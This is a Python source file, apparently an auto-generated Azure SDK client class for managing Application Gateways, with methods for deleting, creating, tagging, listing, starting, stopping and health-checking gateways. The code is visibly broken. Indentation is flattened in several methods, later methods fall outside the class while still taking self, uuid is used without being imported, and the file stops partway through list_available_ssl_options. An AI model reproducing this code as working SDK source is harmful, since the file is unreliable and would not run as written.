from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ApplicationGatewaysOperations(object):
"""ApplicationGatewaysOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-11-01".
"""
models = models
    def __init__(self, client, config, serializer, deserializer):
        """Store the service client, configuration and (de)serializers."""
        # Pipeline client used to build and send HTTP requests.
        self._client = client
        # msrest serializer/deserializer pair for request and response models.
        self._serialize = serializer
        self._deserialize = deserializer
        # Client API version. Constant value: "2017-11-01".
        self.api_version = "2017-11-01"

        self.config = config
    def _delete_initial(
            self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
        """Send the initial DELETE request of the long-running delete.

        Returns a ClientRawResponse when ``raw`` is True, otherwise None.
        Raises CloudError on any status other than 200/202/204.
        """
        # Construct URL
        url = self.delete.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200, 202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
def delete(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
    def get(
            self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
        """Gets the specified application gateway.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param application_gateway_name: The name of the application gateway.
        :type application_gateway_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: ApplicationGateway or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.network.v2017_11_01.models.ApplicationGateway or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('ApplicationGateway', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
    def _create_or_update_initial(
            self, resource_group_name, application_gateway_name, parameters, custom_headers=None, raw=False, **operation_config):
        """Send the initial PUT request of the long-running create/update.

        Returns the deserialized ApplicationGateway (or ClientRawResponse
        when ``raw`` is True). Raises CloudError on any status other than
        200/201.
        """
        # Construct URL
        url = self.create_or_update.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'ApplicationGateway')

        # Construct and send request
        request = self._client.put(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)

        if response.status_code not in [200, 201]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        # 200 = updated existing gateway, 201 = created new; both carry a body.
        if response.status_code == 200:
            deserialized = self._deserialize('ApplicationGateway', response)
        if response.status_code == 201:
            deserialized = self._deserialize('ApplicationGateway', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
def create_or_update(
self, resource_group_name, application_gateway_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param parameters: Parameters supplied to the create or update
application gateway operation.
:type parameters:
~azure.mgmt.network.v2017_11_01.models.ApplicationGateway
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ApplicationGateway or
ClientRawResponse<ApplicationGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
    def _update_tags_initial(
            self, resource_group_name, application_gateway_name, tags=None, custom_headers=None, raw=False, **operation_config):
        """Send the initial PATCH request of the long-running tags update.

        Wraps ``tags`` in a TagsObject body. Returns the deserialized
        ApplicationGateway (or ClientRawResponse when ``raw`` is True).
        Raises CloudError on any status other than 200.
        """
        parameters = models.TagsObject(tags=tags)

        # Construct URL
        url = self.update_tags.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'TagsObject')

        # Construct and send request
        request = self._client.patch(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('ApplicationGateway', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
def update_tags(
self, resource_group_name, application_gateway_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates the specified application gateway tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns ApplicationGateway or
ClientRawResponse<ApplicationGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ApplicationGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}'}
    def list(
            self, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Lists all application gateways in a resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of ApplicationGateway
        :rtype:
         ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def internal_paging(next_link=None, raw=False):
            """Fetch one page: the base URL first, then each `nextLink`."""

            if not next_link:
                # Construct URL
                url = self.list.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                # nextLink is a fully-formed URL; no extra query parameters.
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                # uuid1 gives a per-request correlation id for service-side tracing.
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        deserialized = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            # NOTE(review): header_dict is passed empty and never populated
            # here — a quirk of the generated code.
            header_dict = {}
            client_raw_response = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways'}
    def list_all(
            self, custom_headers=None, raw=False, **operation_config):
        """Gets all the application gateways in a subscription.

        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of ApplicationGateway
        :rtype:
         ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def internal_paging(next_link=None, raw=False):
            """Fetch one page: the base URL first, then each `nextLink`."""

            if not next_link:
                # Construct URL
                url = self.list_all.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                # nextLink is a fully-formed URL; no extra query parameters.
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                # uuid1 gives a per-request correlation id for service-side tracing.
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        deserialized = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies)

        if raw:
            # NOTE(review): header_dict is passed empty and never populated
            # here — a quirk of the generated code.
            header_dict = {}
            client_raw_response = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response

        return deserialized
    list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGateways'}
    def _start_initial(
            self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
        """Send the initial POST request of the long-running start.

        Returns a ClientRawResponse when ``raw`` is True, otherwise None.
        Raises CloudError on any status other than 200/202.
        """
        # Construct URL
        url = self.start.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-request correlation id for service-side tracing.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
def start(
        self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Starts the specified application gateway.

    Long-running operation: issues the initial POST via
    :meth:`_start_initial` and returns a poller for completion.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param application_gateway_name: The name of the application gateway.
    :type application_gateway_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrest.polling.LROPoller[None] or
     ~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._start_initial(
        resource_group_name=resource_group_name,
        application_gateway_name=application_gateway_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Start has no response body; surface the raw response only
        # when the caller asked for it (otherwise returns None).
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Choose polling strategy: default ARM polling, disabled, or a
    # caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/start'}
def _stop_initial(
        self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
    """Send the raw POST that begins stopping an application gateway.

    Internal helper backing :meth:`stop`.  Returns ``None`` on success
    (or a ``ClientRawResponse`` wrapping ``None`` when ``raw`` is True)
    and raises ``CloudError`` for any status other than 200 or 202.
    """
    # Construct URL
    url = self.stop.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Correlation id so the request can be traced service-side.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers may override the generated ones.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, stream=False, **operation_config)

    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # No response body; only wrap the raw response when requested.
    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
def stop(
        self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Stops the specified application gateway in a resource group.

    Long-running operation: issues the initial POST via
    :meth:`_stop_initial` and returns a poller for completion.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param application_gateway_name: The name of the application gateway.
    :type application_gateway_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrest.polling.LROPoller[None] or
     ~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._stop_initial(
        resource_group_name=resource_group_name,
        application_gateway_name=application_gateway_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Stop has no response body; surface the raw response only
        # when the caller asked for it (otherwise returns None).
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Choose polling strategy: default ARM polling, disabled, or a
    # caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/stop'}
def _backend_health_initial(
        self, resource_group_name, application_gateway_name, expand=None, custom_headers=None, raw=False, **operation_config):
    """Send the raw POST that starts the backend-health query.

    Internal helper backing :meth:`backend_health`.  Returns the
    deserialized ``ApplicationGatewayBackendHealth`` when the service
    answers 200 (``None`` on 202), and raises ``CloudError`` for any
    other status.
    """
    # Construct URL
    url = self.backend_health.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
    if expand is not None:
        # Optional $expand of BackendAddressPool/BackendHttpSettings.
        query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, stream=False, **operation_config)

    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    # 202 means "accepted, still running": no body to deserialize yet.
    if response.status_code == 200:
        deserialized = self._deserialize('ApplicationGatewayBackendHealth', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def backend_health(
        self, resource_group_name, application_gateway_name, expand=None, custom_headers=None, raw=False, polling=True, **operation_config):
    """Gets the backend health of the specified application gateway in a
    resource group.

    Long-running operation: issues the initial POST via
    :meth:`_backend_health_initial` and returns a poller whose result is
    the deserialized backend-health document.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param application_gateway_name: The name of the application gateway.
    :type application_gateway_name: str
    :param expand: Expands BackendAddressPool and BackendHttpSettings
     referenced in backend health.
    :type expand: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns
     ApplicationGatewayBackendHealth or
     ClientRawResponse<ApplicationGatewayBackendHealth> if raw==True
    :rtype:
     ~msrest.polling.LROPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayBackendHealth]
     or
     ~msrest.polling.LROPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayBackendHealth]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._backend_health_initial(
        resource_group_name=resource_group_name,
        application_gateway_name=application_gateway_name,
        expand=expand,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Deserialize the final polled response into the model type.
        deserialized = self._deserialize('ApplicationGatewayBackendHealth', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    # Choose polling strategy: default ARM polling, disabled, or a
    # caller-supplied polling object.
    if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
backend_health.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/backendhealth'}
def list_available_waf_rule_sets(
        self, custom_headers=None, raw=False, **operation_config):
    """Lists all available web application firewall rule sets.

    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ApplicationGatewayAvailableWafRuleSetsResult or
     ClientRawResponse if raw=true
    :rtype:
     ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayAvailableWafRuleSetsResult
     or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Resolve the URL template with the encoded subscription id.
    url = self._client.format_url(
        self.list_available_waf_rule_sets.metadata['url'],
        subscriptionId=self._serialize.url(
            "self.config.subscription_id", self.config.subscription_id, 'str'))

    query_parameters = {
        'api-version': self._serialize.query(
            "self.api_version", self.api_version, 'str'),
    }

    # Base headers first, then optional request id, then any
    # caller-supplied overrides, then accept-language.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.get(url, query_parameters)
    response = self._client.send(
        request, header_parameters, stream=False, **operation_config)

    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = self._deserialize(
        'ApplicationGatewayAvailableWafRuleSetsResult', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
list_available_waf_rule_sets.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableWafRuleSets'}
def list_available_ssl_options(
        self, custom_headers=None, raw=False, **operation_config):
    """Lists available Ssl options for configuring Ssl policy.

    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ApplicationGatewayAvailableSslOptions or ClientRawResponse if
     raw=true
    :rtype:
     ~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayAvailableSslOptions
     or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.list_available_ssl_options.metadata['url']
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

